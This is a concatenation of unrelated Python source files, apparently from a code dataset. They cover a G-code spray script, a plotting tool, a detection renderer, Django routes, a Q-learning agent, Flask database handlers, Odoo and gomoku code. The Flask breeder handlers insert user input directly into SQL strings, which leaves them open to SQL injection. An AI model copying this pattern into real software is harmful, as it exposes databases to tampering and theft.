spray_travel_distance * spray_density\n\tspray_syringe_travel = spray_syringe_volume / spray_syringe_volume_per_travel\n\n\tspray_syringe_x = (sp_x2 - sp_x1) * spray_density / spray_syringe_volume_per_travel * -1\n\tspray_syringe_y = spray_distance * spray_density / spray_syringe_volume_per_travel * -1\n\t\n\t# this is an intrinsic factor, test\n\tspray_feed = spray_speed * 1.0\n\t\n\t#prime system\n\tfile.write(sc_go_to_wash)\n\tfile.write(sc_valve_pos.format(spray_solution))\n\tfile.write(sc_air_on)\n\t# prime spray with spray solution\n\tfile.write(sc_aspirate.format(2))\n\tfile.write(sc_valve_spray + sc_speed.format(0.5) + sc_syringe_position.format(0))\n\n\t#start loop\n\tfor n in range(spray_cycles):\n\t\t#aspirate syringe\n\t\tfile.write(sc_air_on)\n\t\tfile.write(sc_syringe_absolute)\n\t\tfile.write(sc_valve_pos.format(spray_solution))\n\t\tfile.write(sc_aspirate.format(spray_syringe_travel + 2))\n\t\tfile.write(sc_valve_spray)\t\t\n\t\tfile.write(sc_speed.format(0.5) + 
sc_syringe_position.format(spray_syringe_travel))\n\t\tfile.write(sc_move_fast_z.format(sp_wash_u))\n\n\t\t#move to start\n\t\ty_offset = spray_distance / spray_lines * n + sp_y1\n\t\tfile.write(sc_move_fast.format(sp_x1, y_offset))\n\t\tfile.write(sc_move_fast_z.format((spray_hight - sp_top)))\n\t\tfile.write(sc_syringe_relative)\n\t\t#spray cycle\n\t\tfor y in range(spray_lines):\n\t\t\tif y % 2 == 0:\n\t\t\t\t#even\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_y, spray_feed))\n\t\t\t\tfile.write(sc_spray.format(sp_x1, y_offset, spray_syringe_x, spray_feed))\n\t\t\telif y == 0:\n\t\t\t\t#first line\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_x, spray_feed))\n\t\t\telse:\n\t\t\t #odd line\n\t\t\t\tfile.write(sc_spray.format(sp_x1, y_offset, spray_syringe_y, spray_feed))\n\t\t\t\tfile.write(sc_spray.format(sp_x2, y_offset, spray_syringe_x, spray_feed))\n\n\t\t\ty_offset += spray_distance\n\n\t\t#move to wash\n\t\tfile.write(\"G1 Y{} Z{} F200\".format(sp_y1, sp_wash_u))\n\t\tfile.write(sc_go_to_wash)\n\n\t\t#empty syringe\n\t\tfile.write(sc_syringe_absolute)\n\t\tfile.write(sc_valve_waste + sc_empty)\n\t\t#back to start\n\n\t\t#clean syringe\n\n\t\tif n != int(spray_cycles):\n\t\t\tfile.write(sc_air_off)\n\t\t\tfile.write(sc_wait.format(spray_delay))\n\t# now do the wash\n\tfile.write(sc_air_off)\n\tfile.write(sc_wash)\n\tfile.write(sc_go_home)\n\tfile.write(sc_motor_off)\n\tfile.write(sc_prime)\n\tfile.write(sc_purge)\n\n\t###################section stop###################\n\nfile.close()","repo_name":"stoeckli/iMatrixSpray","sub_path":"octoprint/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":6152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19403923149","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport os.path as osp\nimport numpy as np\n\n\nimport sys\nimport time\nfrom typing import Tuple\n\ndef rolling_average(data : np.ndarray,\n windowsize : int,\n )-> np.ndarray:\n \"\"\"Compute rolling average\n\n Parameter:\n ---------\n data : np.ndarray\n data for which rolling average should be\n computed\n windowsize : int\n size of window to use upon compuation\n of rolling average. 
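# The coating math above converts a target flow (ul/cm^2) into plunger
# travel: density (ul per mm of path) = flow / 100 * line spacing, and
# travel (mm) = dispensed volume / the 29 ul-per-mm syringe calibration.
# A small self-contained check of those relationships:
def syringe_travel_mm(flow_ul_per_cm2, spacing_mm, path_mm, ul_per_mm=29):
    density = flow_ul_per_cm2 / 100 * spacing_mm  # ul per mm of travel
    volume = density * path_mm                    # total ul dispensed
    return volume / ul_per_mm                     # plunger travel in mm

# with the values used above (0.2 ul/cm^2 flow, 5 mm spacing, 1 m of path):
assert abs(syringe_travel_mm(0.2, 5.0, 1000.0) - 10 / 29) < 1e-9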
Should be odd number.\n Retruns:\n -------\n The rolling avarege\n values for the data array.\n\n \"\"\"\n\n tile = np.ones(windowsize) / windowsize\n smooth = np.convolve(data,\n tile,\n mode = 'valid',\n )\n\n return smooth\n\ndef get_loss_data(loss_file : str,\n )-> Tuple[np.ndarray]:\n \"\"\"Read loss values from file\n\n Parameter:\n ---------\n loss_file : str\n path to loss file\n Returns:\n -------\n Tuple with epoch number as first\n item and loss value as second\n\n\n \"\"\"\n # exit if loss file does not exist\n if not osp.exists(loss_file):\n print(' '.join([f\"ERROR : the file {loss_file}\",\n \"does not exist\",\n ]\n ),\n )\n sys.exit(-1)\n\n # read loss files\n with open(loss_file,\"r+\") as fopen:\n # remove initial and trailing commas\n loss_history = fopen.read().lstrip(',').rstrip(',')\n\n # convert loss history to array\n loss_history = np.array([float(x) for \\\n x in loss_history.split(',')])\n\n # generate epoch values\n epoch = np.arange(1,loss_history.shape[0]+1)\n\n return (epoch,\n loss_history)\n\ndef progress(loss_file : str,\n windowsize : int,\n )-> None:\n \"\"\"Dynamic plot of loss history\n\n Parameter:\n ---------\n loss_file : str\n path to loss history file\n windowsize : int\n size of window to use upon compuation\n of rolling average. Should be odd number.\n\n \"\"\"\n\n # make sure windowsize is int\n if not isinstance(windowsize,int):\n windowsize = int(windowsize)\n\n # if even windowsize value add one\n if windowsize % 2 == 0:\n windowsize += 1\n # length of array that is lost\n # in rolling average computation\n side = int((windowsize - 1) / 2)\n\n # create figure and axes\n fig, ax = plt.subplots(1,\n 1,\n figsize = (8,5),\n num = 13,\n )\n # line to represent loss values\n line1, = ax.plot([],\n [],\n linestyle = 'dashed',\n color = 'black',\n )\n # line to represent rolling average\n # values\n line2, = ax.plot([],\n [],\n color = 'blue',\n alpha = 0.2,\n linewidth = 5,\n )\n\n # customize plot\n ax.set_ylabel('Loss',\n fontsize = 25)\n ax.set_xlabel('Epoch',\n fontsize = 25)\n\n # remove spines\n for pos in ['top','right']:\n ax.spines[pos].set_visible(False)\n\n # update loss plot every 10th second\n keepOn = True\n while keepOn and plt.fignum_exists(13):\n try:\n # get loss data from file\n xdata,ydata = get_loss_data(loss_file)\n # compute rolling average\n ydata_smooth = rolling_average(ydata,\n windowsize = windowsize)\n\n # get limits for axes\n xmin,xmax = xdata.min() - 1, xdata.max() + 1\n ymin,ymax = ydata.min() - 1, ydata.max() + 1\n\n # update axes\n line1.set_xdata(xdata)\n line1.set_ydata(ydata)\n\n line2.set_xdata(xdata[side:-side])\n line2.set_ydata(ydata_smooth)\n\n ax.set_xlim([xmin,xmax])\n ax.set_ylim([ymin,ymax])\n\n # try except to catch interactive\n # closure (CTRL+W) of plot\n try:\n plt.pause(10)\n except:\n print(\"Closing visualization\")\n keepOn = False\n\n except KeyboardInterrupt:\n print(\"Closing visualization\")\n plt.close()\n keepOn = False\n\nif __name__ == '__main__':\n progress(sys.argv[1],\n sys.argv[2])\n","repo_name":"almaan/stereoscope","sub_path":"stsc/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"26205362185","text":"#import os\nimport time\nimport numpy as np\nimport cv2\nfrom freenect import sync_get_depth as get_depth, sync_get_video as get_video\nfrom numpy import asarray\nfrom PIL import Image as PImage\n\nfrom pyqtgraph.Qt import QtGui, 
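# rolling_average() above uses np.convolve in 'valid' mode, so the smoothed
# series is windowsize - 1 samples shorter than the input; progress()
# compensates by plotting it against xdata[side:-side]. A quick check of
# both facts on a linear series (whose rolling mean is itself):
import numpy as np

data = np.arange(10, dtype=float)
window = 5
smooth = np.convolve(data, np.ones(window) / window, mode='valid')
assert smooth.shape[0] == data.shape[0] - (window - 1)
side = (window - 1) // 2
assert np.allclose(smooth, data[side:-side])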
QtCore\nimport pyqtgraph as pg\n\nimport pickle\nimport subprocess\n\ntarget_fps = 10\nseconds_buffer = 10\nms_sleep = 1/target_fps\n\nif __name__ == \"__main__\":\n\n ##########################\n # Setup Qt-Window\n\n pg.setConfigOptions(antialias=True)\n application = QtGui.QApplication([])\n\n window = pg.GraphicsWindow()\n window.resize(1000,600)\n window.setWindowTitle(\"Quality Software.to detection visualizer\")\n container = pg.ImageItem()\n containerplot = window.addPlot()\n containerplot.addItem(container)\n\n ##########################\n # Start infinite loop\n # and write to inp_mode\n # 1 = kinect & 0 = webcam \n \n time_outcounter = 0\n frame_counter = -(seconds_buffer * target_fps)\n while True:\n time_start = time.time()\n window.setWindowTitle(\"Quality Software.to detection visualizer FRAME \" + str(frame_counter))\n cv2.waitKey(1) # find better (non-cv) solution for qt refreshing EDIT: no time -> just keep it\n\n if frame_counter > 0:\n try:\n # unpickle results and frame\n print(\"Grabbing frame #\" + str(frame_counter) + \"\\t\", end='', flush=True)\n cmd = ['wget', \"127.0.0.1:2438/getDetection?id=\" + str(frame_counter), \"-O\", \"/tmp/tta.frame.\" + str(frame_counter), \"wb+\"]\n prc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=\"\")\n\n\n print(\"\\rGrabbing frame #\" + str(frame_counter) + \" [ LOADING ]\\t\", end='', flush=True)\n with open(\"/tmp/tta.frame.\" + str(frame_counter), \"rb\") as handle:\n dataframe = pickle.load(handle)\n\n frame = dataframe[\"frame\"]\n results = dataframe[\"results\"]\n\n print(\"\\rGrabbing frame #\" + str(frame_counter) + \" [ RENDERING ]\\t\", end='', flush=True)\n # receive results (not here but somewhere):\n for cat, score, bounds in results:\n x, y, w, h = bounds\n cv2.rectangle(frame, (int(x-w/2),int(y-h/2)),(int(x+w/2),int(y+h/2)),(255,0,0))\n cv2.putText(frame, str(cat.decode(\"utf-8\")), (int(x), int(y)), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 0))\n p_image = PImage.fromarray(frame)\n p_image.save(\"rendered/\" + str(frame_counter) + \".jpg\", \"JPEG\")\n container.setImage(asarray(p_image.rotate(-90)))\n cv2.waitKey(1) # find better (non-cv) solution for qt refreshing EDIT: no time -> just keep it\n except:\n pass\n\n time_end = time.time()\n time_sleep = ms_sleep - (time_end - time_start)\n if time_sleep < 0:\n time_outcounter += 1\n if time_outcounter > 5:\n print(\"System cant keep up.\")\n #exit(1)\n else:\n time_outcounter = 0\n time.sleep(time_sleep)\n frame_counter += 1\n","repo_name":"StoneLabs/trackemall-level-1","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36903398030","text":"\"\"\"server URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
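# The grab step in renderer.py above shells out to wget and re-reads the
# pickle from /tmp; the same fetch can stay in-process with requests. A
# sketch against the same local endpoint (only acceptable because the
# producer is a trusted local process -- never unpickle untrusted bytes):
import pickle
import requests

def grab_frame(frame_id):
    url = "http://127.0.0.1:2438/getDetection?id={}".format(frame_id)
    resp = requests.get(url, timeout=5)
    resp.raise_for_status()
    return pickle.loads(resp.content)  # {"frame": ..., "results": ...}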
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import include, path, re_path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom rest_framework import routers, permissions\nfrom django.conf import settings\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom app.apps.posts.views import PostCommentView, PostDraftView, PostView\nfrom app.apps.core.views import GoogleLogin\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"News blog\",\n default_version='v1',\n description=\"News blog API endpoints\",\n contact=openapi.Contact(email=\"test@email.com\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny, ),\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'posts', PostView)\nrouter.register(r'drafts', PostDraftView)\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/v1/auth/\", include(\"dj_rest_auth.urls\")),\n path(\"api/v1/social-auth/google/\",\n GoogleLogin.as_view(), name=\"google_login\"),\n path(\"api/v1/posts//comments/\", PostCommentView.as_view({ 'get': 'list', 'post': 'create' }), name='comments'),\n path(\"api/v1/\", include(router.urls)),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += [\n re_path(r'^api/v1/swagger(?P\\.json|\\.yaml)$',\n schema_view.without_ui(cache_timeout=0), name='schema-json'),\n re_path(r'^api/v1/swagger/$', schema_view.with_ui('swagger',\n cache_timeout=0), name='schema-swagger-ui'),\n ]\n","repo_name":"sodiqit/django-news-blog","sub_path":"server/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21955952983","text":"import numpy as np\n\nfrom .agent import Agent\n\n\nclass AvgMinQlearning(Agent):\n def __init__(self, env, beta=0.5, discount=0.9, learning_rate=0.01, epsilon=0.1):\n super().__init__(env, discount, learning_rate, epsilon)\n self.name = \"AvgMin\" + str(beta)\n self.beta = beta\n self.q = np.random.uniform(low=-1, high=1, size=(self.n_states, self.n_actions))\n self.old_values = np.random.uniform(\n low=-1, high=1, size=(self.n_states, self.n_actions)\n )\n\n def choose_best_action(self, state):\n return np.argmax(self.old_values[state])\n\n def calculate_diff(self):\n return self.env.get_result(self.q, self.discount)\n\n def update(self, state, action, r, ns):\n q_estimate = np.max(self.old_values[ns])\n td_target = r + self.discount * q_estimate\n td_delta = td_target - self.q[state, action]\n self.q[state, action] += self.lr * td_delta\n if self.q[state, action] <= self.old_values[state, action]:\n self.old_values[state, action] = self.q[state, action]\n else:\n self.old_values[state, action] *= 1 - self.beta\n self.old_values[state, action] += self.beta * self.q[state, action]\n","repo_name":"yooyoo9/randmin","sub_path":"tabular/agents/avgmin.py","file_name":"avgmin.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8981884075","text":"from flask import render_template, redirect, url_for, flash\nfrom .sql import *\nfrom ..utils import extract_if_any, handle_postgres_error\nimport sys\n\n\ndef handle_add(request, cursor, conn):\n if request.method == 'POST':\n try:\n cursor.execute(GET_LATEST_ID)\n new_id = cursor.fetchall()[0][0] + 1\n breeder_name_to_add = 
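# The update() in AvgMinQlearning above is deliberately asymmetric: when the
# refreshed Q value falls below the stored old_values entry it is adopted
# outright, and when it rises it is only blended in with weight beta. A tiny
# numeric illustration of that rule:
def avgmin_blend(old, new, beta=0.5):
    return new if new <= old else (1 - beta) * old + beta * new

assert avgmin_blend(1.0, 0.2) == 0.2            # decreases pass straight through
assert avgmin_blend(1.0, 2.0, beta=0.5) == 1.5  # increases are only averaged in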
request.form.get('breeder_name_to_add')\n breeder_surname_to_add = request.form.get('breeder_surname_to_add')\n breeder_email_to_add = request.form.get('breeder_email_to_add')\n breeder_phone_number_to_add = request.form.get('breeder_phone_number_to_add')\n cursor.execute(ADD_BREEDER.format(new_id, breeder_name_to_add, breeder_surname_to_add, breeder_email_to_add,\n breeder_phone_number_to_add))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\ndef handle_delete(request, cursor, conn):\n if request.method == 'POST':\n try:\n breeder_id_to_delete = request.form['breeder_id_to_delete']\n cursor.execute(POSSIBLE_TO_DELETE_BREEDER.format(breeder_id_to_delete))\n possible_to_delete_breeder = cursor.fetchall()\n if possible_to_delete_breeder[0][0]:\n cursor.execute(DELETE_BREEDER.format(breeder_id_to_delete))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n\n flash(\"Nie można usunąć hodowcy o id = {}, ponieważ referencję\"\n \" do tego klucza znaleziono w innych tabelach\".format(breeder_id_to_delete))\n return redirect(url_for('editor.breeders'))\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\n\ndef handle_edit(request, cursor, conn):\n try:\n if request.method == 'POST':\n breeder_id_to_edit = request.form.get('breeder_id_to_edit')\n breeder_name_to_edit = request.form.get('breeder_name_to_edit')\n breeder_surname_to_edit = request.form.get('breeder_surname_to_edit')\n breeder_email_to_edit = request.form.get('breeder_email_to_edit')\n breeder_phone_number_to_edit = request.form.get('breeder_phone_number_to_edit')\n cursor.execute(UPDATE_BREEDER.format(breeder_id_to_edit, breeder_name_to_edit, breeder_surname_to_edit,\n breeder_email_to_edit, breeder_phone_number_to_edit))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\n\ndef handle_search(request, cursor, conn):\n if request.method == 'GET':\n try:\n breeder_id = request.args.get('breeder_id')\n breeder_name = request.args.get('breeder_name')\n breeder_surname = request.args.get('breeder_surname')\n query = SEARCH_BREEDER\n any_condition_present = False\n built_query = \"\"\n if breeder_id:\n built_query += \" id = \" + breeder_id\n any_condition_present = True\n if breeder_name:\n if any_condition_present:\n built_query += \" AND \"\n built_query += \" imie = '{}' \".format(breeder_name)\n any_condition_present = True\n if breeder_surname:\n if any_condition_present:\n built_query += \" AND \"\n built_query += \" nazwisko = '{}' \".format(breeder_surname)\n\n if built_query == \"\":\n cursor.execute(ALL_BREEDERS)\n else:\n cursor.execute(query + built_query)\n\n results = cursor.fetchall()\n return render_template('browser/breeders.html', breeders=results)\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'browser.breeders')\n\n\ndef details(cursor, id, conn):\n try:\n stats = []\n cursor.execute(SEARCH_BREEDER + ' id = ' + str(id))\n personal_data = cursor.fetchall()[0]\n\n cursor.execute(BREEDER_KENNELS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_DOGS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_BREEDS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_REGIONS_COUNT.format(id))\n 
stats.append(extract_if_any(cursor, True))\n return render_template('browser/breeder_details.html', personal_data=personal_data, stats=stats)\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'browser.breeders')\n\n\n","repo_name":"dannyxn/Dog-Breeders-Association","sub_path":"main/breeders/breeders_actions.py","file_name":"breeders_actions.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12981472829","text":"def main():\n \n with open('dataset_2_6.txt', 'r') as infile:\n \n for i,j in enumerate(infile):\n if i == 0:\n mytext = str(j.strip()) \n \n else:\n mypat = str(j.strip())\n \n mypatcoyunt = PatternCount(mytext, mypat)\n print(mypatcoyunt)\n \ndef PatternCount(atext, apattern):\n \n mycounter = 0\n \n lentext = len(atext)\n lenpatt = len(apattern)\n \n for i in range(0, lentext-lenpatt+1, 1):\n if str(atext[i:lenpatt+i]) == apattern:\n mycounter += 1\n \n return mycounter\n \n \n\nif __name__ == \"__main__\": main()\n","repo_name":"jcobena/Bioinformatics","sub_path":"0_PatternCount/PatternCount.py","file_name":"PatternCount.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9377626025","text":"from odoo import models, fields, api, _\n\n\n# _ untuk translate\n\nclass khs(models.Model): # inherit dari Model\n _name = 'nilai.khs' # attribut dari class Model (lihat dokumen odoo)\n _description = 'class untuk menyimpan data KHS'\n _rec_name = 'name'\n\n name = fields.Char(compute=\"_compute_name\", store=True, recursive=True)\n semester = fields.Selection([('Genap', 'Genap'),\n ('Gasal', 'Gasal')], 'Semester', required=True, readonly=True,\n default='Genap', states={'draft': [('readonly', False)]}, )\n state = fields.Selection([('draft', 'Draft'),\n ('done', 'Approved'),\n ('canceled', 'Canceled')], 'State', required=True, readonly=True,\n default='draft')\n ips = fields.Float(\"IPS\", compute=\"_compute_ips\", store=True, default=0)\n tahun = fields.Char(\"Tahun\", size=15, default=\"2021/2022\", required=True, readonly=True,\n states={'draft': [('readonly', False)]})\n\n mhs_id = fields.Many2one('nilai.mahasiswa', string='Mahasiswa', readonly=True, ondelete=\"cascade\",\n states={'draft': [('readonly', False)]},\n domain=\"[('state', '=', 'done')]\")\n nilai_mhs_ids = fields.One2many('nilai.nilai_mhs', 'khs_id', string='Nilai mhs', readonly=True,\n states={'draft': [('readonly', False)]})\n _sql_constraints = [('name_unik', 'unique(mhs_id, semester, tahun)', _('The KHS already exist!'))]\n\n @api.depends( \"nilai_mhs_ids\", \"nilai_mhs_ids.mk_id\", \"nilai_mhs_ids.grade\", \"state\")\n def _compute_ips(self):\n self.ips=0\n total_sks=0\n for nilai_mhs1 in self.nilai_mhs_ids:\n self.ips+=nilai_mhs1.subtotal\n total_sks+=nilai_mhs1.mk_sks\n if(total_sks==0):\n self.ips=0\n else:\n self.ips=self.ips/total_sks\n\n def action_done(self):\n self.state = 'done'\n\n\n def action_canceled(self):\n self.state = 'canceled'\n\n\n def action_settodraft(self):\n self.state = 'draft'\n\n @api.depends('mhs_id.name', 'semester', 'tahun')\n def _compute_name(self):\n for s in self:\n s.name = \"%s - %s - %s\" % (s.mhs_id.name, s.semester, s.tahun)\n\n @api.model\n def _name_search(self, name='', args=None, operator='ilike', limit=100, name_get_uid=None):\n args = list(args or [])\n # optimize out the default criterion of ``ilike ''`` that matches everything\n if not 
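# The query builders above interpolate user input straight into SQL via
# str.format (e.g. ADD_BREEDER.format(...)), which is open to SQL injection.
# The standard fix is parameterized execution, letting the driver quote each
# value. A hedged sketch -- the %s placeholder style assumes a psycopg2-like
# PostgreSQL driver, and the table/column names (modeled on the imie/nazwisko
# columns queried above) are illustrative:
ADD_BREEDER_SAFE = ("INSERT INTO breeders (id, imie, nazwisko, email, telefon) "
                    "VALUES (%s, %s, %s, %s, %s);")

def add_breeder_safe(cursor, conn, values):
    cursor.execute(ADD_BREEDER_SAFE, values)  # driver escapes each value
    conn.commit()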
(name == '' and operator == 'ilike'):\n args += [(self._rec_name, operator, name)]\n return self._search(args, limit=limit, access_rights_uid=name_get_uid)\n","repo_name":"yulia7607/custom","sub_path":"nilai/models/khs.py","file_name":"khs.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"355850320","text":"import pygame, render, gomoku, minimax, ai\nfrom gomoku import *\nfrom render import *\nfrom minimax import *\nfrom ai import *\n\n\nclass Game(object):\n def __init__(self, gomoku):\n self.minimax = Minimax(gomoku, 2, 2)\n self.ai = Ai(gomoku)\n self.render = Render(gomoku)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n gomoku.running = False\n\n if gomoku.player:\n if event.type == pygame.MOUSEBUTTONUP:\n if gomoku.mouse_in_botton():\n if not gomoku.playing:\n gomoku.start()\n gomoku.first_step()\n else:\n gomoku.surrender()\n\n elif gomoku.playing:\n pos = pygame.mouse.get_pos()\n r = (pos[0] - PADDING + WIDTH // 2) // (WIDTH + MARGIN)\n c = (pos[1] - PADDING + WIDTH // 2) // (WIDTH + MARGIN)\n\n if 0 <= r < NUMBER_OF_INTERSECTION and 0 <= c < NUMBER_OF_INTERSECTION:\n if gomoku.get_grid_state(r, c) == 0:\n gomoku.lastPosition = [r, c]\n gomoku.set_grid_state(r, c, 1)\n gomoku.numberOfPiece += 1\n\n # check win\n gomoku.win = self.check_win([r, c], gomoku.player)\n if gomoku.win > 0:\n gomoku.playing = False\n gomoku.player = False\n gomoku.com = True\n else:\n gomoku.player = False\n else:\n if gomoku.playing:\n #gomoku.lastPosition = self.minimax.find_way()\n self.minimax.find_way()\n r = gomoku.lastPosition[0]\n c = gomoku.lastPosition[1]\n gomoku.set_grid_state(r, c, 2)\n gomoku.numberOfPiece += 1\n gomoku.win = self.check_win([r, c], gomoku.player)\n if gomoku.win > 0:\n gomoku.playing = False\n gomoku.player = True\n gomoku.com = False\n else:\n gomoku.player = True\n\n if not gomoku.playing:\n gomoku.player = True\n\n def check_win(self, position, player):\n # Check hoà (full bàn cờ)\n if (gomoku.numberOfPiece == NUMBER_OF_INTERSECTION * NUMBER_OF_INTERSECTION):\n return STATUS[1]\n\n # Check thắng thua\n target = 1 if player else 2\n if gomoku.get_grid_state(position[0], position[1]) != target:\n return STATUS[0]\n directions = [([0, 1], [0, -1]), ([1, 0], [-1, 0]), ([-1, 1], [1, -1]), ([1, 1], [-1, -1])]\n for direction in directions:\n mark = 0\n for i in range(2):\n p = position[:]\n while 0 <= p[0] < NUMBER_OF_INTERSECTION and 0 <= p[1] < NUMBER_OF_INTERSECTION:\n if gomoku.get_grid_state(p[0], p[1]) == target:\n mark += 1\n else:\n break\n p[0] += direction[i][0]\n p[1] += direction[i][1]\n if mark >= 6:\n return STATUS[2]\n return STATUS[0]\n \n def player_vs_com(self):\n while gomoku.running: # Game loop\n self.render.gomoku_board_init()\n for event in pygame.event.get():\n self.on_event(event)\n self.render.on_render()\n gomoku.on_cleanup()\n\n def __call__(self):\n self.player_vs_com()\n\nif __name__ == \"__main__\":\n gomoku = Gomoku()\n game = Game(gomoku)\n game()","repo_name":"phucvh255/gomoku","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12309957366","text":"\"\"\"\nPolymorphismApp.py\nBilly Cussen\n12/10/2020\n\"\"\"\n\n#Objects\nimport gc\nimport Language\nfrom Language import myLanguage\nimport English\nfrom English import myEnglish\nimport French\nfrom French import myFrench\nimport 
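# In check_win() above, each direction pair walks outward from the last move
# in both senses and counts the starting cell twice, so a run of k stones
# yields mark == k + 1 -- which is why the winning test is mark >= 6 rather
# than 5. A one-dimensional sketch of that two-sided count:
def run_length_through(cells, pos):
    # length of the run of equal values through pos, origin counted twice
    target, mark = cells[pos], 0
    for step in (1, -1):
        p = pos
        while 0 <= p < len(cells) and cells[p] == target:
            mark += 1
            p += step
    return mark

assert run_length_through([1, 1, 1, 1, 1, 0], 2) == 6  # five in a row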
German\nfrom German import myGerman\n \n#Variables\nrepeat = \"y\"\ninputCheck = True\n\nwhile repeat == \"y\":\n\n myLanguageApp = myLanguage\n print(myLanguageApp.speak())\n inputCheck = True\n #Input - Get Language\n while inputCheck:\n try:\n language = str(input(\"Please enter a Language, \\\"English\\\", \\\"French\\\" or \\\"German\\\": \"))\n language = language.lower()\n except:\n print(\"You need to enter one of the languages specified\")\n finally:\n if language != \"english\" and language != \"french\" and language != \"german\":\n print(\"You need to enter \\\"English\\\", \\\"French\\\" or \\\"German\\\"\")\n else: \n inputCheck = False\n myLanguageApp = None\n\n try:\n if language == \"english\":\n myLanguageApp = myEnglish\n elif language == \"french\":\n myLanguageApp = myFrench\n elif language == \"german\":\n myLanguageApp = myGerman \n else:\n raise Exception(\"Something went Wrong here, invalid language Input!\")\n \n print(myLanguageApp.speak())\n except Exception as e:\n print(e)\n finally:\n myLanguageApp = None\n gc.collect()\n\n repeat = \"\"\n while repeat != \"y\" and repeat != \"n\":\n repeat = str(input(\"Please enter \\\"Y\\\" to Retry, \\\"N\\\" to Exit: \"))\n repeat = repeat.lower()\n if repeat !=\"y\" and repeat != \"n\":\n print(\"You need to enter \\\"Y\\\" or \\\"N\\\"\")\n\nprint(\"Thanks for using my App!\")","repo_name":"BillyCussen/CodingPractice","sub_path":"Python/Software Development Module - Python/Week12/PolymorphismApp.py","file_name":"PolymorphismApp.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71137770026","text":"# Zachary Robin\n# CSCI 169: Programming HW 2\n# Dr. Linnell \n# 04/24/19\n\n# Part 1:\n# Q: Explain in words the output of the given program.\n# A: Running the program yields the following output \n# After local assignment: test spam\n# After nonlocal assignment: nonlocal spam\n# After global assignment: nonlocal spam\n# In global scope: global spam\n# The local assignment makes sense since it is the first \n# assignment and the first function to be called. \n# Next the nonlocal function is called and declared \n# so it makes sense that it works. However, the next \n# portion, the global function is called and executed \n# but the \"nonlocal spam\" is returned instead. This \n# is due to the LEGB scoping rules for python in which \n# the priority is given first to local, then enclosed, \n# global, and finally built in. Since enclosed and \n# local take priority over global, it makes sense that\n# the \"spam\" variable does not change because the \n# scope is the same thus the priority does not change.\n# But when the scope_test is run, the global then \n# takes priority, and is thus used in the final return. \n\n\n# ******************************************************\n# Part 2:\n# 8-Queens problem\n\n# Fill the board\ndef fill():\n row = [0,0,0,0,0,0,0,0]\n column = [\n [1,0,0,0,5,0,0,0]\n ,[0,2,0,0,6,0,0,0]\n ,[0,0,3,0,0,7,0,0]\n ,[0,0,0,4,0,0,8,0]\n ,[1,0,0,0,5,0,0,9]\n ,[0,2,0,0,0,6,0,0]\n ,[0,0,3,0,0,0,7,0]\n ,[0,0,0,4,0,0,0,8]]\n # for i in range(0,8):\n # column.append(row)\n return column\n\n# Prints out the board in an 8x8 matrix. Input needs to be a list of lists, that is columns of rows.\ndef fprint(board):\n for i in range(0,8):\n 